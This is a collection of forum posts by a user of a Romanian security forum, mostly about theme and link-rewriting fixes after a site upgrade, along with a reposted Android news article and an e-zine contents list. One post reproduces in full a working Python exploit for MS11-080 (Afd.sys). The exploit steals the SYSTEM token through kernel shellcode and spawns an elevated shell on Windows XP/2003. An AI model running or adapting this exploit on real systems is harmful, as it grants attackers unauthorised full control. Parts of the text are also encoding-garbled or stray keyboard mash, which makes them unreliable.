Nytro

Nu avem timp sa modificam si celelalte teme, doar RST Beta e cea de care ne ocupam.

Daca dai "Go advanced", ai posibilitatea de a selecta un titlu pentru post. Acel titlu apare acolo, ca aici. Vad ca tema are multe probleme, am reparat multe din ele, dar probabil inca sunt multe, de exemplu textul de la "Online list" pentru Guest sau Boti era de aceeasi culoare cu fundalul si tot asa. Daca gasiti astfel de probleme sa postati aici,

Aici: http://rstcenter.com/forum/usercp.php PS: "Lucrez" la partea cu Like-urile, e posibil ca temporar sa apara foarte urat, sper sa imi iasa ceva frumos, desi slabe sanse. Edit: Am facut modificari la partea grafica a Like-urilor (butonul de deasupra topicului). E ok cat timp nu sunt mai mult de 99 de like-uri. Daca sunt probleme cu el sa ma anuntati. Partea de sub post, cu "Edit post", "Reply", o las asa deocamdata. Am pus-o mai inchis si nu se mai vad iconitele din stanga. Oricum, mie imi place asa, dar spuneti daca vreti sa modific.

Par interesante, iti dau un PM.

Google's Android 4.0 ported to x86 processors Following ARM, an open-source project has ported Google's Android 4.0 to work on a tablet with an AMD chip Agam Shah (IDG News Service) 02 December, 2011 06:50 Google's open-source Android 4.0 operating system for smartphones and tablets has been ported to work with x86 processors, a member of an open-source project involved in the effort said this week. The source code of Android 4.0.1, which is code-named Ice Cream Sandwich, is for developers and designed to work with tablets based on Advanced Micro Devices' low-power x86 chips code-named Brazos, which are typically used in netbooks and low-end laptops. Some AMD chips are being used in tablets such as MSI's WindPad 110W. The port means that tablets with Android 4.0 based on x86 chips could be on the horizon. Intel is the top x86 chipmaker, and the company has already said it is working with Google to bring Android 4.0 to smartphones and tablets. The announcement was made on a discussion forum by Chih-Wei Huang, who belongs to Android-x86.org, a group of volunteer developers focusing on Android for x86. Google released the source code for Android 4.0 earlier this month. However, most of the Android OS development has been centered around ARM processors, which are used in most smartphones and tablets today. The Samsung Galaxy Nexus smartphone with Android 4.0 has already been released, and ARM-based device makers are promising upgrades on tablets and smartphones to Android 4.0 from Android 3.x, which is code-named Honeycomb. The port of Android 4.0.1 to x86 is still a work in progress. The source code, which is available for download on Android-x86.org, provides Wi-Fi, multitouch and hardware graphics acceleration capabilities. It does not provide sound, camera, Ethernet networking or hardware acceleration for Intel-based processors yet. MIPS, a competitive processor architecture to x86 and ARM, will also get Android 4.0 soon. A spokeswoman for MIPS Technologies, which licenses the architecture, earlier this month said the company was waiting for Google to open source the software so its engineers could port the OS. Sursa: http://www.techworld.com.au/article/409081/google_android_4_0_ported_x86_processors

Gata, uitasem de asta.

O sa mai modificam culorile la tema si sa repara micile probleme care apar. @Anonimul: Da, am modificat multe lucruri, dar totul e ok, doar ca vbSEO probabil isi creeaza un cache si de aceea dureaza cateva minute pana anumite link-uri devin active, adica a functionat ulterior fara sa fac nimic.

GNY Zine, Issue #6 ` ` ` ` ` `-sdy+-` `` .sd/` `/ho` `:hdo` `:hd. ``./sdMMMMMMmy+-` .+dy .oNMMMh. `omMMMmo``:y- `/dMMMMm: `/dMMMm. :hdNMMNdNNMMMMMMMMmhshNMMy +mMMMMMMN. .odNMMMMMMmdN/ `/dNNMMMMMN` `+dMMMMMMm` /MMMMMm `-+sdNMMMMMMMMMMMy ..:NMMMMMysh/ `+NMMMMMM: :h/`:MMMMMMoomh/hMMMMMMy /MMMMMm MMMMMM+::::. yMMMMMd: -MMMMMN MMMMMMMy- sMMMMMM- /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMs mMMMMM/ /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMMM/ /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo yMMMMN` /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo NMMMM: /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMN- /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo oMMMh. /MMMMMm `MMMMMM- yMMMMM+ MMMMMN MMMMMMo `yMMh: /MMMMMN. `hMMMMMM- yMMMMMo MMMMMM MMMMMMo`+NNy- /MMMMMMNh/.+mdNMMMMMs :mMMMMMN: MMMMMMs./- MMMMMMdmh+` :yNMMMMMMNNo`-NMMMMMo .hMMMMMMMd. mMMMMMMms. :MMMMMdo. `/hNMMMh. -mMMMMMy` -yMMMh/` .hMMMmo. :NMNh+.` `sMm/ .hMMMMMm- -+-` `-o/` `yms/` -dMy.``` `+NMMMMN. `dh. `sNMNmmmmmmmdyo/::yMMMd` +M: `. /mMMMMMMMMMMMMMMMNNmmy/` Go Null Yourself E-Zine :Md:` `omN+ yNNdhyso++oosyhmNNho-` :yhhyssoshdh+` ...` ``..` Issue #6 - Fall/November 2011 ``......` www.GoNullYourself.org [==================================================================] 0x01 Introduction 0x02 Editorials 0x03 Floating Point Numbers Suck dan 0x04 duper's Code Corner duper 0x05 How Skynet Works: An Intro to Neural Networks elchupathingy 0x06 Defeating NX/DEP With return-to-libc and ROP storm 0x07 A New Kind of Google Mining Shadytel, Inc 0x08 Stupid Shell Tricks teh crew 0x09 An Introduction to Number Theory dan 0x0a Information Security Careers Cheatsheet Dan Guido 0x0b Interview with Dan Rosenberg (bliss) teh crew 0x0c Et Cetera, Etc. teh crew [==================================================================] Download: http://www.exploit-db.com/papers/18168/

O problema stupida cu paginarea, sa vad ce are... Se pare ca apar temporar probleme cu URL rewrite-ul, dar in cateva minute e totul Ok.

MS11-080 Afd.sys Privilege Escalation Exploit ################################################################################ ######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ######## ######### Author: ryujin@offsec.com - Matteo Memelli ######## ######### Spaghetti & Pwnsauce ######## ######### yuck! 0xbaadf00d Elwood@mac&cheese.com ######## ######### ######## ######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ######## ######### for helping out! ######## ######### ######## ######### To my Master Shifu muts: ######## ######### "So that's it, I just need inner peace?" ######## ######### ######## ######### Exploit tested on the following 32bits systems: ######## ######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ######## ################################################################################ from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER, c_char, c_short, c_ushort, c_int, c_uint, c_ulong, c_void_p, c_long, c_char_p) from ctypes.wintypes import HANDLE, DWORD import socket, time, os, struct, sys from optparse import OptionParser usage = "%prog -O TARGET_OS" parser = OptionParser(usage=usage) parser.add_option("-O", "--target-os", type="string", action="store", dest="target_os", help="Target OS. Accepted values: XP, 2K3") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['XP','2K3']: parser.print_help() sys.exit() OS = OS.upper() kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi = windll.Psapi def findSysBase(drvname=None): ARRAY_SIZE = 1024 myarray = c_ulong * ARRAY_SIZE lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddy in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddy: Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[+] Retrieving %s info..." % drvname print "[+] %s base address: %s" % (drvname, hex(baseaddy)) return baseaddy else: if drivername.value.lower().find("krnl") !=-1: print "[+] Retrieving Kernel info..." print "[+] Kernel version:", drivername.value print "[+] Kernel base address: %s" % hex(baseaddy) return (baseaddy, drivername.value) return None print "[>] MS11-080 Privilege Escalation Exploit" print "[>] Matteo Memelli - ryujin@offsec.com" print "[>] Release Date 28/11/2011" WSAGetLastError = windll.Ws2_32.WSAGetLastError WSAGetLastError.argtypes = () WSAGetLastError.restype = c_int SOCKET = c_int WSASocket = windll.Ws2_32.WSASocketA WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD) WSASocket.restype = SOCKET closesocket = windll.Ws2_32.closesocket closesocket.argtypes = (SOCKET,) closesocket.restype = c_int connect = windll.Ws2_32.connect connect.argtypes = (SOCKET, c_void_p, c_int) connect.restype = c_int class sockaddr_in(Structure): _fields_ = [ ("sin_family", c_short), ("sin_port", c_ushort), ("sin_addr", c_ulong), ("sin_zero", c_char * 8), ] ## Create our deviceiocontrol socket handle client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0) if client == ~0: raise OSError, "WSASocket: %s" % (WSAGetLastError(),) try: addr = sockaddr_in() addr.sin_family = socket.AF_INET addr.sin_port = socket.htons(4455) addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1 ## We need to connect to a closed port, socket state must be CONNECTING connect(client, byref(addr), sizeof(addr)) except: closesocket(client) raise baseadd = c_int(0x1001) MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zerobits = c_int(0) RegionSize = c_int(0x1000) written = c_int(0) ## This will trigger the path to AfdRestartJoin irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42" "\x00\x00\x00\x00\x44\x44\x44\x44" "\x01\x00\x00\x00" "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231) ## Allocate space for the input buffer dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) # Copy input buffer to it kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written)) startPage = c_int(0x00020000) kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written)) ################################# KERNEL INFO ################################## lpDriver = c_char_p() lpPath = c_char_p() lpDrvAddress = c_long() (krnlbase, kernelver) = findSysBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase print "[+] HalDispatchTable address:", hex(HalDispatchTable) halbase = findSysBase("hal.dll") ## WinXP SP3 if OS == "XP": HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3 HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3 ## Win2k3 SP2 else: HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3 HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3 print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) ################################# EXPLOITATION ################################# shellcode_address_dep = 0x0002071e shellcode_address_nodep = 0x000207b8 padding = "\x90"*2 HalDispatchTable0x4 = HalDispatchTable + 0x4 HalDispatchTable0x8 = HalDispatchTable + 0x8 ## tokenbkaddr = 0x00020900 if OS == "XP": _KPROCESS = "\x44" _TOKEN = "\xc8" _UPID = "\x84" _APLINKS = "\x88" else: _KPROCESS = "\x38" _TOKEN = "\xd8" _UPID = "\x94" _APLINKS = "\x98" restore_ptrs = "\x31\xc0" + \ "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) tokenstealing = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x10" restore_token = "\x52" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\x15\x00\x09\x02\x00" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5a" +\ "\xc2\x10" shellcode = padding + restore_ptrs + tokenstealing shellcode_size = len(shellcode) orig_size = shellcode_size # Write shellcode in userspace (dep) kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode, shellcode_size, byref(written)) # Write shellcode in userspace *(nodep) kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode, shellcode_size, byref(written)) ## Trigger Pointer Overwrite print "[*] Triggering AFDJoinLeaf pointer overwrite..." IOCTL = 0x000120bb # AFDJoinLeaf inputbuffer = 0x1004 inputbuffer_size = 0x108 outputbuffer_size = 0x0 # Bypass Probe for Write outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1 IoStatusBlock = c_ulong() NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None, byref(IoStatusBlock), IOCTL, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size ) ## Trigger shellcode inp = c_ulong() out = c_ulong() inp = 0x1337 hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) ## Spawn a system shell, w00t! print "[*] Spawning a SYSTEM shell..." os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32") ############################## POST EXPLOITATION ############################### print "[*] Restoring token..." ## Restore the thingie shellcode = padding + restore_ptrs + restore_token shellcode_size = len(shellcode) trail_padding = (orig_size - shellcode_size) * "\x00" shellcode += trail_padding shellcode_size += (orig_size - shellcode_size) ## Write restore shellcode in userspace (dep) kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode, shellcode_size, byref(written)) ## Write restore shellcode in userspace (nodep) kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode, shellcode_size, byref(written)) ## Overwrite HalDispatchTable once again NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None, byref(IoStatusBlock), IOCTL, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size ) ## Trigger restore shellcode hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) print "[+] Restore done! Have a nice day :)" Sursa: http://www.exploit-db.com/exploits/18176/

dfgdfgdgdf

Update: Am readus link-urile la forma initiala, gen "44039-rst-upgrade-2.rst" E posibil sa apara probleme, in mare am verificat si pare ok, daca ceva nu e in regula, daca apar link-uri invalide va rog sa ma anuntati. PS: Unele link-uri erau de forma "44039-rst-upgrade-2-post-1337.html", acum apar cu ".rst", veti fi redirectionati de pe un astfel de link cu "html". Sper sa nu apara probleme.

O sa ne ocupam si de homepage, in limita timpului disponibil.

Cu tema sper ca vom rezolva in cateva zile. Mai are cineva aceasta problema, cu 10 caractere cand scrie un mesaj valid, adica nu e tot un "quote" de exemplu?

Daca ati fi cautat putin ati fi gasit asta: http://en.wikipedia.org/wiki/Features_new_to_Windows_7 Daca ati vrea sa intrati in detalii: http://channel9.msdn.com/Shows/Going+Deep/Mark-Russinovich-Inside-Windows-7 Cateva detalii tehnice: http://www.slideshare.net/msigeek/windows-7-ver-4

Multumim pentru feedback. Da, principalele probleme sunt: - o tema noua, "unica", ca cea veche, in rest nu avem ce face, sunteti diferiti, aveti gusturi diferite, nu avem cum sa va facem pe plac la toti, dar cred ca vom lasa acele teme, poate le vom modifica putin si ar trebui sa fie ok pentru toata lumea - rescrierea link-urilor si aducerea la vechea forma Cam asta am avea de facut pentru moment, sa speram ca azi vom rezolva problema link-urilor.

RST Upgrade Am facut niste modificari in aceasta seara, am actualizat forumul si am mai facut cateva schimbari minore. Principala problema care trebuia reparata era problema caracterelor speciale, a diacriticelor, care ar trebui sa fie rezolvata. E posibil sa apara destule probleme, de unele sunt constient, de unele inca nu. Daca gasiti o problema sunteti rugati sa postati aici sau sa imi dati un PM. Temele doar au fost instalate, nu am avut timp sa le modificam, insa sunt problematice, atat din punctul de vedere al culorilor, cat si din faptul ca lipsesc niste imagini. Sfatul meu e sa folositi cateva zile tema Default, apoi vom rezolva si aceasta problema. Vom lucra zilele acestea si vor mai interveni schimbari, deci asteptam de asemenea sugestii.

? ? c?ciul? (breve); când semnul este pus deasupra unei litere ce reprezint? o vocal? pentru a indica o pronun?ie scurt? (de exemplu o semivocal?) atunci se nume?te semnul scurt. Â â Î î circumflex; în alte limbi valoarea fonetic? a acestui semn diacritic este diferit?. ? ? ? ? virguli??[2] sau virgul?, plasat? sub literele corespunz?toare s, S, t, T. Variantele cu sedil? sunt foarte r?spândite mai ales în redactarea computerizat?, dar incorecte (vezi articolele ?, ?). Ç ç ? ? sedil?; folosit? de exemplu în limbile francez?, albanez? ?i turc?. Aspectul ei este diferit de cel al virguli?ei folosite în literele române?ti ? ?i ?. Ñ ñ Ã ã tild?; folosit? de exemplu în limbile spaniol? ?i portughez? sau în Alfabetul Fonetic Interna?ional. ? ? Š š há?ek; folosit de exemplu în limbile ceh?, slovac?, sârb?, croat? etc. Ä ä Ö ö trem? sau umlaut; se folose?te de exemplu în limbile finlandez?, suedez?, german?, francez? ?i turc?. È è Ò ò accent grav; folosit de exemplu în limbile francez? ?i italian?. É é Á á accent ascu?it; folosit de exemplu în limbile francez? ?i maghiar?. În limba român? se folose?te uneori la cuvintele-titlu din dic?ionare sau pentru a marca accentul în cuvintele care altfel s-ar confunda, de exemplu: (doi) copíi este diferit de (dou?) cópii.

From 0×90 to 0x4c454554, a journey into exploitation

From 0

Aveti rabdare o zi, doua... Rezolvam.

Stiu, dar nu am avut timp, zilele astea scapam de toate problemele. Dai Copy la Post, dai Edit si Save. Merge asa, dar nu in toate cazurile.

Ori scri prea mult, ori prea putin.

Uhuu, nici nu vreau sa revad codul, e bagat la gramada, am secvente la care inchid intr-un loc cate 7-8 acolade... Da, eram la inceput. Nu sunt adeptul framework-urilor, nu m-am mai ocupat de el, am trecut la C/C++ si altele si nu am mai avut timp.

Sa fim seriosi, ia ganditi-va, cati dintre voi ati schimbat statusurile cuiva? Destui...